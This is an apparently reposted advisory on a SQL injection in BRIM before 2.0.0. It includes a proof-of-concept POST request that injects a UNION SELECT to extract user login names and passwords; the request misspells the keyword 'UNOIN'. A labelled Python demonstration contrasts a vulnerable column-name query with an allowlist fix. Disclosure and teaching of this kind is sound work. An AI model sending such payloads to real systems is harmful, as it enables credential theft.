Source: 自学PHP网 Date: 2015-04-17 13:03
BRIM < 2.0.0 SQL Injection Information
Title: BRIM < 2.0.0 SQL Injection
Author: ifnull
Tested on: Apache/2.2.3, PHP/5.1.6, MySQL 5.0.45, although it can run in any environment. Example uses MySQL 5 query escape but can easily be ported to prior versions of MySQL.
Description: Unlike CVE-2008-4082, this will work with or without magic_quotes_gpc enabled. Like the last exploit, however, you must first create an account and enable "tasks". By default anyone can create an account and the accounts are automatically approved.

Program information
Version: < 2.0.0
URL: http://sourceforge.net/projects/brim/
Description: BRIM is an MVC framework, written in PHP and based on items with a hierarchical relationship. The list of plugins makes BRIM an Information Manager with plugins like bookmarks, a calendar, contacts, tasks, notes, RSS etc. The application is multilingual.

Proof of Concept
POST URI: /index.php
Data: plugin=tasks&field=1%3D1%20UNOIN%20SELECT%201%2C2%2C3%2C4%2CCONCAT(loginname%2C0x3a%2Cpassword)%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%20from%20brim_users--&value=asdf&action=searchTasks
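The proof of concept places SQL in the `field` parameter and contains no quote characters, which is consistent with the statement that magic_quotes_gpc makes no difference. The following is an added example, not BRIM's code and not part of the original advisory. It assumes the search handler pastes `field` into the query as a column name, and uses a hypothetical `tasks` table, hypothetical function names, constructed rows, and SQLite in place of MySQL to show why quote escaping does not help and how an allowlist on the column name closes the hole.

```python
import sqlite3

# Hypothetical column allowlist; these are not BRIM's real column names.
ALLOWED_FIELDS = {"name", "description"}

def make_db():
    """In-memory database with constructed sample rows for two users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tasks (owner TEXT, name TEXT, description TEXT)")
    db.executemany("INSERT INTO tasks VALUES (?, ?, ?)", [
        ("alice", "buy milk", "groceries"),
        ("bob", "file taxes", "private"),
    ])
    return db

def magic_quotes(s):
    """Rough stand-in for magic_quotes_gpc: backslash-escape quotes."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def search_vulnerable(db, owner, field, value):
    # Assumed flaw: `field` from the request is used as a column name.
    # Escaping quotes leaves a quote-free expression untouched, so the
    # caller controls the structure of the WHERE clause.
    sql = ("SELECT owner, name FROM tasks "
           f"WHERE owner = ? AND {magic_quotes(field)} LIKE ?")
    return db.execute(sql, (owner, f"%{value}%")).fetchall()

def search_hardened(db, owner, field, value):
    # Identifiers cannot be bound as parameters, so the column name is
    # checked against a fixed allowlist; the value stays a bound parameter.
    if field not in ALLOWED_FIELDS:
        raise ValueError(f"unsupported search field: {field!r}")
    sql = f"SELECT owner, name FROM tasks WHERE owner = ? AND {field} LIKE ?"
    return db.execute(sql, (owner, f"%{value}%")).fetchall()

if __name__ == "__main__":
    db = make_db()
    crafted = "1=1 OR 1=1 OR name"  # constructed input, no quotes needed
    print(search_vulnerable(db, "alice", crafted, "asdf"))  # other users' rows too
    try:
        search_hardened(db, "alice", crafted, "asdf")
    except ValueError as exc:
        print("rejected:", exc)
```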